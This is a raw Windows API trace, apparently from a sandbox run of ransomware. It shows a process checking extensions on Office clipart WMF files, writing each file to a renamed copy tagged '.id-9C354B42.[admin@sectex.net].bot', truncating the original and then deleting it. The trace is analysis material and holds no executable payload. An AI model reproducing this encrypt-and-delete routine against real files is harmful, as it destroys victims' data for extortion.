	[0145.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.357] lstrlenW (lpString=".1cd") returned 4
	[0145.357] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.357] lstrlenW (lpString=".jpg") returned 4
	[0145.357] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.357] lstrlenW (lpString=".doc") returned 4
	[0145.357] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.357] lstrlenW (lpString=".docx") returned 5
	[0145.357] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.357] lstrlenW (lpString=".pdf") returned 4
	[0145.357] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.357] lstrlenW (lpString=".xls") returned 4
	[0145.357] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.357] lstrlenW (lpString=".xlsx") returned 5
	[0145.357] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.357] lstrlenW (lpString=".ppt") returned 4
	[0145.357] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.357] lstrlenW (lpString=".zip") returned 4
	[0145.357] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.357] lstrlenW (lpString=".rar") returned 4
	[0145.357] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.357] lstrlenW (lpString=".bz2") returned 4
	[0145.358] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.358] lstrlenW (lpString=".7z") returned 3
	[0145.358] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.358] lstrlenW (lpString=".dbf") returned 4
	[0145.358] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.358] lstrlenW (lpString=".1cd") returned 4
	[0145.358] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63
	[0145.358] lstrlenW (lpString=".jpg") returned 4
	[0145.358] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.358] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.358] lstrlenW (lpString="ED00172_.WMF") returned 12
	[0145.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.359] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2700) returned 1
	[0145.359] CloseHandle (hObject=0x3d4) returned 1
	[0145.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf")) returned 0x20
	[0145.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.359] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.359] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.360] GetLastError () returned 0x0
	[0145.360] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xa8c, lpOverlapped=0x0) returned 1
	[0145.362] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xa90, lpOverlapped=0x0) returned 1
	[0145.363] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.363] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.363] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.364] CloseHandle (hObject=0x3d8) returned 1
	[0145.364] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.364] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.366] CloseHandle (hObject=0x3d4) returned 1
	[0145.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.366] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf")) returned 1
	[0145.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.366] lstrlenW (lpString=".doc") returned 4
	[0145.367] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.367] lstrlenW (lpString=".docx") returned 5
	[0145.367] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.367] lstrlenW (lpString=".pdf") returned 4
	[0145.367] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.367] lstrlenW (lpString=".xls") returned 4
	[0145.367] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.367] lstrlenW (lpString=".xlsx") returned 5
	[0145.367] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.367] lstrlenW (lpString=".ppt") returned 4
	[0145.367] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.367] lstrlenW (lpString=".zip") returned 4
	[0145.367] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.367] lstrlenW (lpString=".rar") returned 4
	[0145.367] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.367] lstrlenW (lpString=".bz2") returned 4
	[0145.367] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.367] lstrlenW (lpString=".7z") returned 3
	[0145.367] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.367] lstrlenW (lpString=".dbf") returned 4
	[0145.367] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.367] lstrlenW (lpString=".1cd") returned 4
	[0145.367] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.367] lstrlenW (lpString=".jpg") returned 4
	[0145.367] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.367] lstrlenW (lpString=".doc") returned 4
	[0145.367] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.368] lstrlenW (lpString=".docx") returned 5
	[0145.368] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.368] lstrlenW (lpString=".pdf") returned 4
	[0145.368] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.368] lstrlenW (lpString=".xls") returned 4
	[0145.368] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.368] lstrlenW (lpString=".xlsx") returned 5
	[0145.368] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.368] lstrlenW (lpString=".ppt") returned 4
	[0145.368] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.368] lstrlenW (lpString=".zip") returned 4
	[0145.368] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.368] lstrlenW (lpString=".rar") returned 4
	[0145.368] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.368] lstrlenW (lpString=".bz2") returned 4
	[0145.368] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.368] lstrlenW (lpString=".7z") returned 3
	[0145.368] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.368] lstrlenW (lpString=".dbf") returned 4
	[0145.368] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.368] lstrlenW (lpString=".1cd") returned 4
	[0145.368] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63
	[0145.368] lstrlenW (lpString=".jpg") returned 4
	[0145.369] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.369] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.369] lstrlenW (lpString="ED00184_.WMF") returned 12
	[0145.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.369] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=6958) returned 1
	[0145.369] CloseHandle (hObject=0x3d4) returned 1
	[0145.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf")) returned 0x20
	[0145.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.370] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.370] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.371] GetLastError () returned 0x0
	[0145.371] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1b2e, lpOverlapped=0x0) returned 1
	[0145.373] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1b30, lpOverlapped=0x0) returned 1
	[0145.374] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.374] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.374] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.375] CloseHandle (hObject=0x3d8) returned 1
	[0145.375] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.375] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.377] CloseHandle (hObject=0x3d4) returned 1
	[0145.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.377] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf")) returned 1
	[0145.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.378] lstrlenW (lpString=".doc") returned 4
	[0145.378] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.378] lstrlenW (lpString=".docx") returned 5
	[0145.378] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.378] lstrlenW (lpString=".pdf") returned 4
	[0145.378] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.378] lstrlenW (lpString=".xls") returned 4
	[0145.378] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.378] lstrlenW (lpString=".xlsx") returned 5
	[0145.378] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.378] lstrlenW (lpString=".ppt") returned 4
	[0145.378] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.378] lstrlenW (lpString=".zip") returned 4
	[0145.378] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.378] lstrlenW (lpString=".rar") returned 4
	[0145.378] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.378] lstrlenW (lpString=".bz2") returned 4
	[0145.378] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.378] lstrlenW (lpString=".7z") returned 3
	[0145.378] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.378] lstrlenW (lpString=".dbf") returned 4
	[0145.378] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.378] lstrlenW (lpString=".1cd") returned 4
	[0145.378] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.379] lstrlenW (lpString=".jpg") returned 4
	[0145.379] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.379] lstrlenW (lpString=".doc") returned 4
	[0145.379] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.379] lstrlenW (lpString=".docx") returned 5
	[0145.379] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.379] lstrlenW (lpString=".pdf") returned 4
	[0145.379] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.379] lstrlenW (lpString=".xls") returned 4
	[0145.379] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.379] lstrlenW (lpString=".xlsx") returned 5
	[0145.379] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.379] lstrlenW (lpString=".ppt") returned 4
	[0145.379] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.379] lstrlenW (lpString=".zip") returned 4
	[0145.379] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.379] lstrlenW (lpString=".rar") returned 4
	[0145.379] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.379] lstrlenW (lpString=".bz2") returned 4
	[0145.379] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.379] lstrlenW (lpString=".7z") returned 3
	[0145.379] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.379] lstrlenW (lpString=".dbf") returned 4
	[0145.379] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.379] lstrlenW (lpString=".1cd") returned 4
	[0145.379] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 63
	[0145.379] lstrlenW (lpString=".jpg") returned 4
	[0145.380] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.380] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.380] lstrlenW (lpString="EN00006_.WMF") returned 12
	[0145.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.381] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=13936) returned 1
	[0145.381] CloseHandle (hObject=0x3d4) returned 1
	[0145.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf")) returned 0x20
	[0145.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.382] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.382] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.384] GetLastError () returned 0x0
	[0145.384] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3670, lpOverlapped=0x0) returned 1
	[0145.386] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3680, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3680, lpOverlapped=0x0) returned 1
	[0145.387] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.388] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.388] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.388] CloseHandle (hObject=0x3d8) returned 1
	[0145.388] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.388] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.390] CloseHandle (hObject=0x3d4) returned 1
	[0145.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf")) returned 1
	[0145.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.391] lstrlenW (lpString=".doc") returned 4
	[0145.391] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.391] lstrlenW (lpString=".docx") returned 5
	[0145.391] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.391] lstrlenW (lpString=".pdf") returned 4
	[0145.391] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.391] lstrlenW (lpString=".xls") returned 4
	[0145.391] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.391] lstrlenW (lpString=".xlsx") returned 5
	[0145.391] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.391] lstrlenW (lpString=".ppt") returned 4
	[0145.391] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.391] lstrlenW (lpString=".zip") returned 4
	[0145.391] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.391] lstrlenW (lpString=".rar") returned 4
	[0145.391] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.391] lstrlenW (lpString=".bz2") returned 4
	[0145.391] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.391] lstrlenW (lpString=".7z") returned 3
	[0145.391] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.391] lstrlenW (lpString=".dbf") returned 4
	[0145.391] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.392] lstrlenW (lpString=".1cd") returned 4
	[0145.392] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
